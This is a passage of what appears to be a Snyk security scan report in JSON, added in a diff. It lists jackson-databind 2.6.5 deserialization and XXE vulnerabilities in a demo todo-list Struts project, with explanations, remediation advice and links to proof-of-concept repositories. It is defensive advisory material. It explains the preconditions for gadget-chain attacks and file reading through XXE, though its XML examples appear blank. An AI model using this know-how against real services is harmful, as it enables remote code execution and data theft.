Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-24750) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.pastdev.httpcomponents.configuration.JndiConfiguration`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2798)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-10650) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to the class `ignite-jta`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2658)\n- [GitHub PR](https://github.com/FasterXML/jackson-databind/pull/2864#issuecomment-701026600)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1048302", + "shortDescription": { + "text": "High severity - XML External Entity (XXE) Injection vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-25649) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to XML External Entity (XXE) Injection. A flaw was found in FasterXML Jackson Databind, where it does not have entity expansion secured properly in the `DOMDeserializer` class. The highest threat from this vulnerability is data integrity.\n\n# Details\nXXE Injection is a type of attack against an application that parses XML input.\nXML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.\n\nAttacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.\n\nFor example, below is a sample XML document, containing an XML element- username.\n\n```\n\n\n John\n\n```\n\nAn external XML entity - `xxe`, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of `/etc/passwd` and display it to the user rendered by `username`.\n\n```\n\n\n]>\n &xxe;\n\n```\n\nOther XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.\n\n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.7, 2.10.5.1 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/612f971b78c60202e9cd75a299050c8f2d724a59)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2589)\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1887664)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-611", + "maven" + ], + "cvssv3_baseScore": 8.2, + "security-severity": "8.2" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-35490) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.PerUserPoolDataSource`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-35491) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.SharedPoolDataSource`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-35728) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in `org.glassfish.web/javax.servlet.jsp.jstl`).\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2999)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-35728)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36187) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36184) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36184)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36186) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-36180) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › 